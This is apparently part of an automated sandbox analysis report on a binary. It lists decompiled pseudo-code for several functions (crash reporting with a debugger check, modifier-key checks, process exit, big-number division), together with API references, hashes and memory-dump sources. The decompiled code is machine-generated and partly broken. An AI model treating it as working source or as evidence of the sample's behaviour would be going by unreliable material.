Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: c86c09f31fd22a1679e3d6ba80f74cd53e0682cd874762ccbbf63a69da501925
Instruction ID: 54d657c5176dee7b9074146b8720fc2cf36dae263084e486f4b5c3dd51230cc6
Opcode Fuzzy Hash: c86c09f31fd22a1679e3d6ba80f74cd53e0682cd874762ccbbf63a69da501925
Instruction Fuzzy Hash: 32F062312406119FE7159F7AAC4DF6E7BA8FF89712F01442CF952D7260EB70C904CA52

Uniqueness

Uniqueness Score: -1.00%

Function 00CDBC81, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00CDBC81(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t70;
				signed int _t72;
				signed int _t74;

				_t70 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t72 = _t74;
				_t40 =  *0xd0f014; // 0xbb5e653b
				_t41 = _t40 ^ _t72;
				_v8 = _t40 ^ _t72;
				_push(__edi);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00CBED82(_t41);
					_pop(_t62);
				}
				E00CC1E00(_t67,  &_v804, 0, 0x50);
				E00CC1E00(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t70;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00CBED82(_t57);
				}
				return E00CBDC11(_v8 ^ _t72);
			}

0x00cdbc81
0x00cdbc81
0x00cdbc81
0x00cdbc81
0x00cdbc84
0x00cdbc8c
0x00cdbc91
0x00cdbc93
0x00cdbc9a
0x00cdbc9b
0x00cdbc9d
0x00cdbca0
0x00cdbca5
0x00cdbca5
0x00cdbcb1
0x00cdbcc4
0x00cdbcd2
0x00cdbcd8
0x00cdbcde
0x00cdbce4
0x00cdbcea
0x00cdbcf0
0x00cdbcf6
0x00cdbcfc
0x00cdbd02
0x00cdbd08
0x00cdbd0f
0x00cdbd16
0x00cdbd1d
0x00cdbd24
0x00cdbd2b
0x00cdbd32
0x00cdbd33
0x00cdbd3c
0x00cdbd42
0x00cdbd45
0x00cdbd4b
0x00cdbd58
0x00cdbd61
0x00cdbd6a
0x00cdbd73
0x00cdbd81
0x00cdbd83
0x00cdbd98
0x00cdbda4
0x00cdbda7
0x00cdbdac
0x00cdbdbb

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CDBD79
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CDBD83
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CDBD90

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 306aca11d3df054161210f938058d726cdc95a7c5203b3056ad427dc9c93352a
Instruction ID: 509ebe90c1cbb8b61fdaaf0d1630c001207c9ad745fca48ef23e29d446fa15b5
Opcode Fuzzy Hash: 306aca11d3df054161210f938058d726cdc95a7c5203b3056ad427dc9c93352a
Instruction Fuzzy Hash: C631D5749012289BCB21DF65DC88BDCBBB8BF08710F5041EAE81CA7261E7709F819F45

Uniqueness

Uniqueness Score: -1.00%

Function 00CB8A55, Relevance: 4.6, APIs: 3, Instructions: 72
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CB8A55(intOrPtr _a4, void* _a8) {
				void _v32;
				void* _t20;
				intOrPtr* _t26;
				void* _t28;
				signed int _t30;
				signed int _t31;
				void* _t35;
				void* _t48;

				_t31 = 7;
				_push(memcpy( &_v32, _a8, _t31 << 2));
				_push(0);
				_a8 = 0;
				_t28 = 4;
				_t34 =  ==  ? _t28 : _a4 - 0x78;
				_t35 = E00CB686B( ==  ? _t28 : _a4 - 0x78);
				_t20 = _a8;
				if(_t35 >= 0) {
					if(_t20 == 0) {
						_t35 = 1;
					} else {
						GetKeyState(0x10);
						_t48 =  <  ? 1 : 0;
						if(GetKeyState(0x11) < 0) {
							_t48 = _t48 + 2;
						}
						if(GetKeyState(0x12) < 0) {
							_t48 = _t48 + _t28;
						}
						_t26 = _a8;
						_t35 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v32, _t48);
						_t20 = _a8;
					}
				}
				_t30 = 0 | _t35 != 0x00000000;
				if(_t20 != 0) {
					 *((intOrPtr*)( *_t20 + 8))(_t20);
				}
				return _t30;
			}

0x00cb8a66
0x00cb8a6c
0x00cb8a72
0x00cb8a77
0x00cb8a7d
0x00cb8a7e
0x00cb8a86
0x00cb8a88
0x00cb8a8d
0x00cb8a91
0x00cb8ad4
0x00cb8a93
0x00cb8a9b
0x00cb8aa5
0x00cb8aad
0x00cb8aaf
0x00cb8aaf
0x00cb8ab9
0x00cb8abb
0x00cb8abb
0x00cb8abd
0x00cb8acb
0x00cb8acd
0x00cb8acd
0x00cb8a91
0x00cb8ad9
0x00cb8ade
0x00cb8ae3
0x00cb8ae3
0x00cb8aec

APIs

GetKeyState.USER32(00000010), ref: 00CB8A9B
GetKeyState.USER32(00000011), ref: 00CB8AA8
GetKeyState.USER32(00000012), ref: 00CB8AB4

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 200bd0363a3a0312ceafbd7d7b9637a83db38f87faad93c7bfe89fbd10990d2b
Instruction ID: ec6e7d2130f18d295f40a729ec92fad1201b31ce843a0c502daf85f603867406
Opcode Fuzzy Hash: 200bd0363a3a0312ceafbd7d7b9637a83db38f87faad93c7bfe89fbd10990d2b
Instruction Fuzzy Hash: EA11667670021AAFDF089E69C855EEB37ACEB44754F008029ED16DB181DA71ED06DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CDD54C, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CDD54C(int _a4) {
				void* _t14;

				if(E00CE73DD(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00CDD5FC(_t14, _a4);
				ExitProcess(_a4);
			}

0x00cdd559
0x00cdd575
0x00cdd575
0x00cdd57e
0x00cdd587

APIs

GetCurrentProcess.KERNEL32(?,?,00CDD54B,?,?,?,?,?,00CE6FA3), ref: 00CDD56E
TerminateProcess.KERNEL32(00000000,?,00CDD54B,?,?,?,?,?,00CE6FA3), ref: 00CDD575
ExitProcess.KERNEL32 ref: 00CDD587

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 395403bc0bd78321816ea6fc8540dec5c1eef3004d3c8570d1d6745b46c049a5
Instruction ID: 057fbf72e10e9a175bca3f87242c948e062b2be8e9a692a38b81d29906906ed3
Opcode Fuzzy Hash: 395403bc0bd78321816ea6fc8540dec5c1eef3004d3c8570d1d6745b46c049a5
Instruction Fuzzy Hash: 36E04671800148AFCF117B24ED8CB2C3F69EB00381B100425FA068A231EB35EE42DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00CF16A0, Relevance: 3.5, APIs: 2, Instructions: 452
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00CF16A0(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t190;
				signed int _t191;
				intOrPtr _t192;
				signed int _t195;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t204;
				signed int _t210;
				intOrPtr _t216;
				void* _t219;
				signed int _t221;
				signed int _t232;
				void* _t236;
				signed int _t239;
				signed int* _t245;
				signed int _t247;
				signed int* _t248;
				signed int* _t250;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t255;
				signed int _t260;
				unsigned int _t261;
				signed int _t263;
				signed int* _t267;
				signed int _t268;
				signed int _t269;
				intOrPtr _t271;
				void* _t275;
				signed char _t281;
				signed int* _t284;
				signed int _t288;
				signed int* _t289;
				intOrPtr* _t296;
				signed int _t298;
				signed int _t299;
				signed int* _t302;
				signed int _t303;
				signed int _t305;
				intOrPtr* _t306;
				signed int _t310;
				signed int _t311;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				void* _t325;
				signed int _t326;
				signed int _t329;
				signed int _t333;
				signed int* _t335;
				signed int _t339;
				signed int _t341;
				signed int _t342;
				signed int _t344;
				void* _t345;
				signed int _t350;
				signed int _t357;
				signed int* _t358;

				_t245 = _a4;
				_t339 =  *_t245;
				if(_t339 == 0) {
					L76:
					__eflags = 0;
					return 0;
				} else {
					_t296 = _a8;
					_t190 =  *_t296;
					_v56 = _t190;
					if(_t190 == 0) {
						goto L76;
					} else {
						_t321 = _t190 - 1;
						_t260 = _t339 - 1;
						_v12 = _t260;
						if(_t321 != 0) {
							__eflags = _t321 - _t260;
							if(_t321 > _t260) {
								goto L76;
							} else {
								_t191 = _t260;
								_t298 = _t260 - _t321;
								__eflags = _t260 - _t298;
								if(_t260 < _t298) {
									L20:
									_t298 = _t298 + 1;
									__eflags = _t298;
								} else {
									_t284 =  &(_t245[_t260 + 1]);
									_t357 = _a8 + _t321 * 4 + 4;
									__eflags = _t357;
									while(1) {
										__eflags =  *_t357 -  *_t284;
										if(__eflags != 0) {
											break;
										}
										_t191 = _t191 - 1;
										_t357 = _t357 - 4;
										_t284 = _t284 - 4;
										__eflags = _t191 - _t298;
										if(_t191 >= _t298) {
											continue;
										} else {
											goto L20;
										}
										goto L21;
									}
									if(__eflags < 0) {
										goto L20;
									}
								}
								L21:
								__eflags = _t298;
								if(__eflags == 0) {
									goto L76;
								} else {
									_t192 = _a8;
									_t247 = _v56;
									_t341 =  *(_t192 + _t247 * 4);
									_t55 = _t247 * 4; // 0xffffdeb9
									_t261 =  *(_t192 + _t55 - 4);
									asm("bsr eax, esi");
									_v52 = _t341;
									_v36 = _t261;
									if(__eflags == 0) {
										_t322 = 0x20;
									} else {
										_t322 = 0x1f - _t192;
									}
									_v16 = _t322;
									_v48 = 0x20 - _t322;
									__eflags = _t322;
									if(_t322 != 0) {
										_t281 = _t322;
										_v36 = _v36 << _t281;
										_v52 = _t341 << _t281 | _t261 >> _v48;
										__eflags = _t247 - 2;
										if(_t247 > 2) {
											_t68 = _t247 * 4; // 0xe850ffff
											_t70 =  &_v36;
											 *_t70 = _v36 |  *(_a8 + _t68 - 8) >> _v48;
											__eflags =  *_t70;
										}
									}
									_t342 = 0;
									_v32 = 0;
									_t299 = _t298 + 0xffffffff;
									__eflags = _t299;
									_v28 = _t299;
									if(_t299 >= 0) {
										_t197 = _t299 + _t247;
										_t250 = _a4;
										_v60 = _t197;
										_v64 = _t250 + 4 + _t299 * 4;
										_t267 = _t250 - 4 + _t197 * 4;
										_v80 = _t267;
										do {
											__eflags = _t197 - _v12;
											if(_t197 > _v12) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 = _t267[2];
											}
											_t303 = _t267[1];
											_t268 =  *_t267;
											_v76 = _t198;
											_v40 = 0;
											_v8 = _t198;
											_v24 = _t268;
											__eflags = _t322;
											if(_t322 != 0) {
												_t310 = _v8;
												_t329 = _t268 >> _v48;
												_t221 = E00CFC1C0(_t303, _v16, _t310);
												_t268 = _v16;
												_t198 = _t310;
												_t303 = _t329 | _t221;
												_t342 = _v24 << _t268;
												__eflags = _v60 - 3;
												_v8 = _t310;
												_v24 = _t342;
												if(_v60 >= 3) {
													_t268 = _v48;
													_t342 = _t342 |  *(_t250 + (_v56 + _v28) * 4 - 8) >> _t268;
													__eflags = _t342;
													_t198 = _v8;
													_v24 = _t342;
												}
											}
											_push(_t250);
											_t199 = E00CFBFE0(_t303, _t198, _v52, 0);
											_v40 = _t250;
											_t252 = _t199;
											_t344 = _t342 ^ _t342;
											_t200 = _t303;
											_v8 = _t252;
											_v20 = _t200;
											_t324 = _t268;
											_v72 = _t252;
											_v68 = _t200;
											_v40 = _t344;
											__eflags = _t200;
											if(_t200 != 0) {
												L38:
												_t253 = _t252 + 1;
												asm("adc eax, 0xffffffff");
												_t324 = _t324 + E00CFC080(_t253, _t200, _v52, 0);
												asm("adc esi, edx");
												_t252 = _t253 | 0xffffffff;
												_t200 = 0;
												__eflags = 0;
												_v40 = _t344;
												_v8 = _t252;
												_v72 = _t252;
												_v20 = 0;
												_v68 = 0;
											} else {
												__eflags = _t252 - 0xffffffff;
												if(_t252 > 0xffffffff) {
													goto L38;
												}
											}
											__eflags = _t344;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L43;
												} else {
													__eflags = _t324 - 0xffffffff;
													if(_t324 <= 0xffffffff) {
														while(1) {
															L43:
															_v8 = _v24;
															_t219 = E00CFC080(_v36, 0, _t252, _t200);
															__eflags = _t303 - _t324;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L46:
																_t200 = _v20;
																_t252 = _t252 + 0xffffffff;
																_v72 = _t252;
																asm("adc eax, 0xffffffff");
																_t324 = _t324 + _v52;
																__eflags = _t324;
																_v20 = _t200;
																asm("adc dword [ebp-0x24], 0x0");
																_v68 = _t200;
																if(_t324 == 0) {
																	__eflags = _t324 - 0xffffffff;
																	if(_t324 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t219 - _v8;
																if(_t219 <= _v8) {
																	break;
																} else {
																	goto L46;
																}
															}
															L50:
															_v8 = _t252;
															goto L51;
														}
														_t200 = _v20;
														goto L50;
													}
												}
											}
											L51:
											__eflags = _t200;
											if(_t200 != 0) {
												L53:
												_t269 = _v56;
												_t325 = 0;
												_t345 = 0;
												__eflags = _t269;
												if(_t269 != 0) {
													_t255 = _v64;
													_t210 = _a8 + 4;
													__eflags = _t210;
													_v40 = _t210;
													_v24 = _t269;
													do {
														_v12 =  *_t210;
														_t216 =  *_t255;
														_t275 = _t325 + _v72 * _v12;
														asm("adc esi, edx");
														_t325 = _t345;
														_t345 = 0;
														__eflags = _t216 - _t275;
														if(_t216 < _t275) {
															_t325 = _t325 + 1;
															asm("adc esi, esi");
														}
														 *_t255 = _t216 - _t275;
														_t255 = _t255 + 4;
														_t210 = _v40 + 4;
														_t153 =  &_v24;
														 *_t153 = _v24 - 1;
														__eflags =  *_t153;
														_v40 = _t210;
													} while ( *_t153 != 0);
													_t252 = _v8;
													_t269 = _v56;
												}
												__eflags = 0 - _t345;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L62:
														__eflags = _t269;
														if(_t269 != 0) {
															_t254 = 0;
															_t306 = _v64;
															_t350 = _a8 + 4;
															__eflags = _t350;
															_t326 = _t269;
															do {
																_t271 =  *_t306;
																_t161 = _t350 + 4; // 0xf8835959
																_t350 = _t161;
																_t306 = _t306 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t306 - 4)) = _t271 +  *((intOrPtr*)(_t350 - 4)) + _t254;
																asm("adc eax, 0x0");
																_t254 = 0;
																_t326 = _t326 - 1;
																__eflags = _t326;
															} while (_t326 != 0);
															_t252 = _v8;
														}
														_t252 = _t252 + 0xffffffff;
														asm("adc dword [ebp-0x10], 0xffffffff");
													} else {
														__eflags = _v76 - _t325;
														if(_v76 < _t325) {
															goto L62;
														}
													}
												}
												_t204 = _v60 - 1;
												__eflags = _t204;
												_v12 = _t204;
											} else {
												__eflags = _t252;
												if(_t252 != 0) {
													goto L53;
												}
											}
											_t342 = _v32;
											_t250 = _a4;
											asm("adc esi, 0x0");
											_v64 = _v64 - 4;
											_t305 = _v28 - 1;
											_t322 = _v16;
											_t267 = _v80 - 4;
											_v32 = 0 + _t252;
											_t197 = _v60 - 1;
											_v28 = _t305;
											_v60 = _t197;
											_v80 = _t267;
											__eflags = _t305;
										} while (_t305 >= 0);
									}
									_t248 = _a4;
									_t263 = _v12 + 1;
									_t195 = _t263;
									__eflags = _t195 -  *_t248;
									if(_t195 <  *_t248) {
										_t302 =  &(( &(_t248[1]))[_t195]);
										do {
											 *_t302 = 0;
											_t302 =  &(_t302[1]);
											_t195 = _t195 + 1;
											__eflags = _t195 -  *_t248;
										} while (_t195 <  *_t248);
									}
									 *_t248 = _t263;
									__eflags = _t263;
									if(_t263 != 0) {
										while(1) {
											__eflags = _t248[_t263];
											if(_t248[_t263] != 0) {
												goto L75;
											}
											_t263 = _t263 + 0xffffffff;
											__eflags = _t263;
											 *_t248 = _t263;
											if(_t263 != 0) {
												continue;
											}
											goto L75;
										}
									}
									L75:
									return _v32;
								}
							}
						} else {
							_t7 = _t296 + 4; // 0x96850f0a
							_t311 =  *_t7;
							_v12 = _t311;
							if(_t311 != 1) {
								__eflags = _t260;
								if(_t260 != 0) {
									_t333 = 0;
									_v16 = 0;
									_v40 = 0;
									_v28 = 0;
									__eflags = _t260 - 0xffffffff;
									if(_t260 != 0xffffffff) {
										_t288 = _t260 + 1;
										__eflags = _t288;
										_t289 =  &(_t245[_t288]);
										_v32 = _t289;
										do {
											_t236 = E00CFBFE0( *_t289, _t333, _t311, 0);
											_v28 = _t245;
											_t245 = _t245;
											_v68 = _t311;
											_t333 = _t289;
											_v16 = 0 + _t236;
											_t311 = _v12;
											asm("adc ecx, 0x0");
											_v40 = _v16;
											_t289 = _v32 - 4;
											_v32 = _t289;
											_t339 = _t339 - 1;
											__eflags = _t339;
										} while (_t339 != 0);
										_t245 = _a4;
									}
									_v544 = 0;
									_t358 =  &(_t245[1]);
									 *_t245 = 0;
									E00CF3A12(_t358, 0x1cc,  &_v540, 0);
									_t232 = _v28;
									__eflags = 0 - _t232;
									 *_t358 = _t333;
									_t245[2] = _t232;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t245 = 0xbadbae;
									return _v16;
								} else {
									_t335 =  &(_t245[1]);
									_v544 = _t260;
									 *_t245 = _t260;
									E00CF3A12(_t335, 0x1cc,  &_v540, _t260);
									_t239 = _t245[1];
									_t316 = _t239 % _v12;
									__eflags = 0 - _t316;
									 *_t335 = _t316;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t245 =  ~0x00000000;
									return _t239 / _v12;
								}
							} else {
								_v544 = _t321;
								 *_t245 = _t321;
								E00CF3A12( &(_t245[1]), 0x1cc,  &_v540, _t321);
								return _t245[1];
							}
						}
					}
				}
			}

0x00cf16ac
0x00cf16b1
0x00cf16b5
0x00cf1b2d
0x00cf1b31
0x00cf1b37
0x00cf16bb
0x00cf16bb
0x00cf16be
0x00cf16c0
0x00cf16c5
0x00000000
0x00cf16cb
0x00cf16cb
0x00cf16ce
0x00cf16d1
0x00cf16d6
0x00cf1807
0x00cf1809
0x00000000
0x00cf180f
0x00cf1811
0x00cf1813
0x00cf1815
0x00cf1817
0x00cf183d
0x00cf183d
0x00cf183d
0x00cf1819
0x00cf1820
0x00cf1823
0x00cf1823
0x00cf1826
0x00cf182a
0x00cf182c
0x00000000
0x00000000
0x00cf182e
0x00cf182f
0x00cf1832
0x00cf1835
0x00cf1837
0x00000000
0x00cf1839
0x00000000
0x00cf1839
0x00000000
0x00cf1837
0x00cf183b
0x00000000
0x00000000
0x00cf183b
0x00cf183e
0x00cf183e
0x00cf1840
0x00000000
0x00cf1846
0x00cf1846
0x00cf1849
0x00cf184c
0x00cf184f
0x00cf184f
0x00cf1853
0x00cf1856
0x00cf1859
0x00cf185c
0x00cf1867
0x00cf185e
0x00cf1863
0x00cf1863
0x00cf1871
0x00cf1876
0x00cf1879
0x00cf187b
0x00cf1884
0x00cf1886
0x00cf188d
0x00cf1890
0x00cf1893
0x00cf189b
0x00cf18a1
0x00cf18a1
0x00cf18a1
0x00cf18a1
0x00cf1893
0x00cf18a4
0x00cf18a6
0x00cf18ad
0x00cf18ad
0x00cf18b0
0x00cf18b3
0x00cf18b9
0x00cf18bc
0x00cf18bf
0x00cf18c8
0x00cf18ce
0x00cf18d1
0x00cf18d4
0x00cf18d4
0x00cf18d7
0x00cf18de
0x00cf18de
0x00cf18d9
0x00cf18d9
0x00cf18d9
0x00cf18e0
0x00cf18e3
0x00cf18e5
0x00cf18e8
0x00cf18ef
0x00cf18f2
0x00cf18f5
0x00cf18f7
0x00cf1902
0x00cf1905
0x00cf190a
0x00cf190f
0x00cf1916
0x00cf191b
0x00cf191d
0x00cf191f
0x00cf1923
0x00cf1926
0x00cf1929
0x00cf1931
0x00cf193a
0x00cf193a
0x00cf193c
0x00cf193f
0x00cf193f
0x00cf1929
0x00cf1942
0x00cf194a
0x00cf194f
0x00cf1954
0x00cf1956
0x00cf1958
0x00cf195a
0x00cf195d
0x00cf1960
0x00cf1962
0x00cf1965
0x00cf1968
0x00cf196b
0x00cf196d
0x00cf1974
0x00cf1979
0x00cf197c
0x00cf1986
0x00cf1988
0x00cf198a
0x00cf198d
0x00cf198d
0x00cf198f
0x00cf1992
0x00cf1995
0x00cf1998
0x00cf199b
0x00cf196f
0x00cf196f
0x00cf1972
0x00000000
0x00000000
0x00cf1972
0x00cf199e
0x00cf19a0
0x00cf19a2
0x00000000
0x00cf19a4
0x00cf19a4
0x00cf19a7
0x00cf19b0
0x00cf19b0
0x00cf19be
0x00cf19c1
0x00cf19c6
0x00cf19c8
0x00000000
0x00000000
0x00cf19ca
0x00cf19d1
0x00cf19d1
0x00cf19d4
0x00cf19d7
0x00cf19da
0x00cf19dd
0x00cf19dd
0x00cf19e0
0x00cf19e3
0x00cf19e7
0x00cf19ea
0x00cf19ec
0x00cf19ef
0x00000000
0x00000000
0x00cf19f1
0x00cf19ef
0x00cf19cc
0x00cf19cc
0x00cf19cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf19cf
0x00cf19f6
0x00cf19f6
0x00000000
0x00cf19f6
0x00cf19f3
0x00000000
0x00cf19f3
0x00cf19a7
0x00cf19a2
0x00cf19f9
0x00cf19f9
0x00cf19fb
0x00cf1a05
0x00cf1a05
0x00cf1a08
0x00cf1a0a
0x00cf1a0c
0x00cf1a0e
0x00cf1a13
0x00cf1a16
0x00cf1a16
0x00cf1a19
0x00cf1a1c
0x00cf1a20
0x00cf1a22
0x00cf1a37
0x00cf1a39
0x00cf1a3b
0x00cf1a3d
0x00cf1a3f
0x00cf1a41
0x00cf1a43
0x00cf1a45
0x00cf1a48
0x00cf1a48
0x00cf1a4c
0x00cf1a4e
0x00cf1a54
0x00cf1a57
0x00cf1a57
0x00cf1a57
0x00cf1a5b
0x00cf1a5b
0x00cf1a60
0x00cf1a63
0x00cf1a63
0x00cf1a68
0x00cf1a6a
0x00cf1a6c
0x00cf1a73
0x00cf1a73
0x00cf1a75
0x00cf1a7a
0x00cf1a7c
0x00cf1a7f
0x00cf1a7f
0x00cf1a82
0x00cf1a84
0x00cf1a84
0x00cf1a86
0x00cf1a86
0x00cf1a8b
0x00cf1a91
0x00cf1a95
0x00cf1a98
0x00cf1a9b
0x00cf1a9d
0x00cf1a9d
0x00cf1a9d
0x00cf1aa2
0x00cf1aa2
0x00cf1aa5
0x00cf1aa8
0x00cf1a6e
0x00cf1a6e
0x00cf1a71
0x00000000
0x00000000
0x00cf1a71
0x00cf1a6c
0x00cf1aaf
0x00cf1aaf
0x00cf1ab0
0x00cf19fd
0x00cf19fd
0x00cf19ff
0x00000000
0x00000000
0x00cf19ff
0x00cf1ab3
0x00cf1ac0
0x00cf1ac3
0x00cf1ac6
0x00cf1aca
0x00cf1acb
0x00cf1ace
0x00cf1ad1
0x00cf1ad7
0x00cf1ad8
0x00cf1adb
0x00cf1ade
0x00cf1ae1
0x00cf1ae1
0x00cf18d4
0x00cf1aec
0x00cf1aef
0x00cf1af0
0x00cf1af2
0x00cf1af4
0x00cf1af9
0x00cf1b00
0x00cf1b00
0x00cf1b06
0x00cf1b09
0x00cf1b0a
0x00cf1b0a
0x00cf1b00
0x00cf1b0e
0x00cf1b10
0x00cf1b12
0x00cf1b14
0x00cf1b14
0x00cf1b18
0x00000000
0x00000000
0x00cf1b1a
0x00cf1b1a
0x00cf1b1d
0x00cf1b1f
0x00000000
0x00000000
0x00000000
0x00cf1b1f
0x00cf1b14
0x00cf1b21
0x00cf1b2c
0x00cf1b2c
0x00cf1840
0x00cf16dc
0x00cf16dc
0x00cf16dc
0x00cf16df
0x00cf16e5
0x00cf1716
0x00cf1718
0x00cf175a
0x00cf175c
0x00cf1763
0x00cf176a
0x00cf176d
0x00cf1770
0x00cf1772
0x00cf1772
0x00cf1773
0x00cf1776
0x00cf1780
0x00cf178a
0x00cf178f
0x00cf1792
0x00cf1794
0x00cf1797
0x00cf17a0
0x00cf17a3
0x00cf17a6
0x00cf17a9
0x00cf17af
0x00cf17b2
0x00cf17b5
0x00cf17b5
0x00cf17b5
0x00cf17ba
0x00cf17ba
0x00cf17c5
0x00cf17d0
0x00cf17d3
0x00cf17df
0x00cf17e4
0x00cf17ef
0x00cf17f1
0x00cf17f3
0x00cf17f9
0x00cf17fe
0x00cf1800
0x00cf1806
0x00cf171a
0x00cf1725
0x00cf1728
0x00cf1734
0x00cf1736
0x00cf173d
0x00cf173f
0x00cf1747
0x00cf1749
0x00cf174b
0x00cf1750
0x00cf1753
0x00cf1759
0x00cf1759
0x00cf16e7
0x00cf16f5
0x00cf1701
0x00cf1703
0x00cf1715
0x00cf1715
0x00cf16e5
0x00cf16d6
0x00cf16c5

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

